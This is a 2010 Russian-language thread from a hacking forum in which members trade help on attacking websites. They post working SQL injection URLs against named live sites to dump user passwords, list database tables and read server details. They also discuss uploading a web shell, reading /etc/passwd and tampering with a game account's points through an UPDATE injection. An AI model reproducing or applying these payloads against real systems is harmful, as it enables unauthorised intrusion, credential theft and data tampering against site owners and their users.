Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. ALIM

    ALIM Member

    Joined:
    20 Apr 2010
    Messages:
    60
    Likes Received:
    6
    Reputations:
    5
    используя такую конструкцию пытаюсь извлечь пассы
    union select password,2,3,4,5,6,7,8,9,10 from users --
    выводит 1 пасс
    групконкат не работает
    union select password,2,3,4,5,6,7,8,9,10 from users limit 1 --
    выводит тот же пасс
    union select password,2,3,4,5,6,7,8,9,10 from users limit 2 --
    выводит тот же пасс
    union select password,2,3,4,5,6,7,8,9,10 from users limit 1,0 --
    union select password,2,3,4,5,6,7,8,9,10 from users limit 1,1 --
    union select password,2,3,4,5,6,7,8,9,10 from users limit 2,1 --
    ничего не выводит
    почему так может происходить? Как правильно сделать запрос?
     
  2. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,547
    Likes Received:
    1,242
    Reputations:
    273
    union select password,2,3,4,5,6,7,8,9,10 from users where username='admin'--
     
    1 person likes this.
  3. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    Здесь есть скуля?

    http://www.diymtb.com.au/displayItems.asp?cid=14'
     
  4. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    402
    Likes Received:
    46
    Reputations:
    40
    http://www.diymtb.com.au/displayItems.asp?cid=14'+order+by+10%23
     
  5. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    Не могу вывести version(),database(),user(). Как это сделать?
     
  6. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    402
    Likes Received:
    46
    Reputations:
    40
    http://www.diymtb.com.au/displayItems.asp?cid=14'+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10%23

    p.s. не забудь +++ поставить я всетаки знаменитым хачу быть как Gorev...///=)))
     
    2 people like this.
  7. DavanG3

    DavanG3 New Member

    Joined:
    17 Apr 2010
    Messages:
    18
    Likes Received:
    1
    Reputations:
    0
    Хм жаль беспокоить Как я могу загрузить оболочку здесь?

    Code:
    http://www.vales.by/catalog.php?action=show_object&id=-99%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,17--
     
  8. KandidaT'S

    KandidaT'S New Member

    Joined:
    9 Jul 2010
    Messages:
    58
    Likes Received:
    3
    Reputations:
    0
    моно ли тут прочитать etc/passwd?
    http://kirovka.ru/business/?parentid=-30&article=-641+union+select+1,2,3,4,5,6,7,8,9--
     
  9. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    544
    Likes Received:
    203
    Reputations:
    293
    Через phpbb который там есть (по крайней мере есть таблица phpbb3_acl_users)

    http://www.vales.by/catalog.php?action=show_object&id=-99%20UNION%20SELECT%201,2,3,4,group_concat%28table_name%29,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.tables--

    Админка (не форума http://www.vales.by/admin/login.php)

    Прочитать, кажись нельзя, но залить шелл возможно получится:
    http://kirovka.ru/business/?parentid=-30&article=-641+union+select+1,2,concat_ws%280x3a,table_name%29,4,5,6,7,8,9+from+information_schema.tables+--+
    Есть несколько форумов и так далее....
     
    #15409 z0mbyak, 19 Nov 2010
    Last edited: 19 Nov 2010
  10. killrok6

    killrok6 New Member

    Joined:
    30 Jul 2010
    Messages:
    33
    Likes Received:
    3
    Reputations:
    0
    Привет Всем! Подскажите правильно я перевел этот код:

    UPDATE dbo.Character SET AddPoint = AddPoint + 1
    WHERE AccountID = 'login'

    На вот этот:

    'update/**/dbo.character/**/set/**/addpoint='addpoint+1'/**/where/**/accountid='login'
     
  11. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    544
    Likes Received:
    203
    Reputations:
    293
    Смотря что ты хочешь... если получить в базе addpoint+1, то да, если увеличить addpoint на единицу, то нет и, кстати, первый апостроф (перед update не нужен)
     
    #15411 z0mbyak, 19 Nov 2010
    Last edited: 19 Nov 2010
  12. killrok6

    killrok6 New Member

    Joined:
    30 Jul 2010
    Messages:
    33
    Likes Received:
    3
    Reputations:
    0
    union+update/**/dbo.character/**/set/**/addpoint='addpoint+1'/**/where/**/accountid='killro0000'

    Типо так?
     
  13. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    544
    Likes Received:
    203
    Reputations:
    293
    Если нужен инкремент addpoint, то /set/**/addpoint='addpoint'+1/
    без union, это я обшибся малость:)

    Вот пример
    http://www.mysql.ru/webboard/index.html?n1=1160&n2=2
     
    #15413 z0mbyak, 19 Nov 2010
    Last edited: 19 Nov 2010
  14. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    Все равно, не могу найти. Набираю в браузере:

    http://www.diymtb.com.au/displayItems.asp?cid=14'+union+select+1,2,user(),4,5,6,7,8,9,10%23

    и, где выводиться user()?
     
    #15414 FlaktW, 19 Nov 2010
    Last edited: 19 Nov 2010
  15. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    402
    Likes Received:
    46
    Reputations:
    40
    дайте ссылки на уязвимости (только php-inj.sql-inj) в Wordpress версии:
    2.7
    2.9.2
    3.0
    3.0.1
     
  16. Чакэ

    Чакэ Elder - Старейшина

    Joined:
    15 Aug 2010
    Messages:
    260
    Likes Received:
    65
    Reputations:
    62
    ну и кагбэ в инкременте ошиблись немного. кавычки не нужны, совсем.
     
    2 people like this.
  17. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    Помогите подобрать количество столбцов.

    http://calidad.com.au/ProdSearchResult.asp?cID=948-BK2'
     
  18. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    Code:
    http://calidad.com.au/ProdSearchResult.asp?cID=948-BK2' union select 1,2,3,4,5 from CalProd where 1 and '1
    Бд - McAccess
    Имхо, одна из самых неблагодарных субд для проведения инъекций)
    И к тому же из-за наличия второго запроса с иным количеством полей мы не получим вывод)
    Так что советую поискать другие параметры, бо (проверил) они там присутствуют.
    З.ы - более подробно можно почитать тут:
    https://forum.antichat.ru/threadnav50550-1.html
     
    1 person likes this.
  19. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12

    Не могли бы вы уточнить, как вы нашли таблицу from CalProd. Это brutforce или какой то иной способ? Заранее спасибо за ответ.
     
  20. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    Таблицу нашел исходя из сообщения об ошибке вот тут:
    Code:
    http://calidad.com.au/FindProdStep1.asp?MAN=Olivetti%27%29
    Других способов узнать имена таблиц (кроме перебора, конечно же) в данном случае нет. Так как доступ к таблице MSysObjects закрыт.
     
Loading...
Thread Status:
Not open for further replies.